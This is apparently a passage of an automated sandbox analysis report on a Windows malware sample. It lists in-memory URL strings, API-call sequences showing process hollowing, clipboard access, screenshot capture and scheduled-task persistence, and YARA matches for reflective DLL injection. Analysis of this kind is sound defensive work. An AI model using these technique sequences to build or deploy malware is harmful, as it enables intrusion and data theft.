                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSdX
                          Source: 6148.tmp.ssg.exe, 00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: explorer.exe, 00000005.00000000.1331938648.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                          Source: explorer.exe, 00000005.00000000.1331938648.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                          Source: explorer.exe, 00000005.00000000.1331938648.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                          Source: explorer.exe, 00000005.00000000.1331938648.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                          Source: explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                          Source: explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://buy.live.com/
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
                          Source: explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
                          Source: explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
                          Source: explorer.exe, 00000005.00000000.1331938648.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                          Source: 56C7.tmp.ctx.exe, 00000010.00000003.1541380109.0000026ABBDA6000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1550156579.0000026ABBDA7000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD8B000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1541214933.0000026ABBD70000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                          Source: 56C7.tmp.ctx.exe, 00000010.00000002.1550634163.0000026ABD6B0000.00000004.00001000.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                          Source: 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                          Source: 56C7.tmp.ctx.exe, 00000010.00000003.1541380109.0000026ABBDA6000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1550156579.0000026ABBDA7000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD8B000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1541214933.0000026ABBD70000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                          Source: 56C7.tmp.ctx.exe, 00000010.00000003.1541380109.0000026ABBDA6000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000002.1550156579.0000026ABBDA7000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD8B000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1541214933.0000026ABBD70000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1538320870.0000026ABBD75000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 00000010.00000003.1540992398.0000026ABBD4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hHhh7.img
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                          Source: explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.co
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps
                          Source: explorer.exe, 00000005.00000003.3082261334.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2193186163.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3822099222.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.0000000008903000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://passwordreset.micros
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3866809329.000000000B9B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comeer0
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tip.passwordreset.microso
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                          Source: explorer.exe, 00000005.00000003.3084849985.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3822099222.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.00000000087FE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                          Source: 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B344028000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34402C000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512879245.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1532153483.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34402C000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1530758520.000001B34401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                          Source: explorer.exe, 00000005.00000000.1329505266.0000000006968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3817750333.000000000695E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/best-cities-by-generation/
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C7DA0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0C5C7DA0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C7DA0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0C5C7DA0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C7BB0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0C5C7BB0
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004B61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,18_2_004B61F0

                          System Summary

                          barindex
                          Source: 5.2.explorer.exe.c5b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.2.explorer.exe.aff0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.0.explorer.exe.aff0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 2.2.svchost.exe.21c7ec7d000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.2.explorer.exe.bf9b350.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.0.explorer.exe.aff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 2.2.svchost.exe.21c7ec7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.2.explorer.exe.bf9b350.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.2.explorer.exe.aff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.2.explorer.exe.c5b0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 5.3.explorer.exe.bf9b350.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 00000005.00000000.1347856091.000000000AFF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 00000002.00000002.3800744010.0000021C7EC7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC42048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7CDC42048
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0C5B1370
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF673522048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,6_2_00007FF673522048
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeFile created: C:\Windows\Tasks\Gxtuum.job
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC4345C0_2_00007FF7CDC4345C
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC420480_2_00007FF7CDC42048
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEA345C2_2_00007FF68DEA345C
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEA20482_2_00007FF68DEA2048
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B002B145_2_0B002B14
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B01BBB05_2_0B01BBB0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF0BF05_2_0AFF0BF0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B01A1D85_2_0B01A1D8
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71FD5_2_0AFF71FD
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71F35_2_0AFF71F3
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71EB5_2_0AFF71EB
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71E15_2_0AFF71E1
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71D75_2_0AFF71D7
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71CD5_2_0AFF71CD
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF71405_2_0AFF7140
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B0148D05_2_0B0148D0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0AFF66C05_2_0AFF66C0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B018FD45_2_0B018FD4
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B00F7E85_2_0B00F7E8
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B01D6005_2_0B01D600
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B00FE285_2_0B00FE28
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B011EBC5_2_0B011EBC
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B0046C05_2_0B0046C0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B0145205_2_0B014520
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B01DD325_2_0B01DD32
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B0195F85_2_0B0195F8
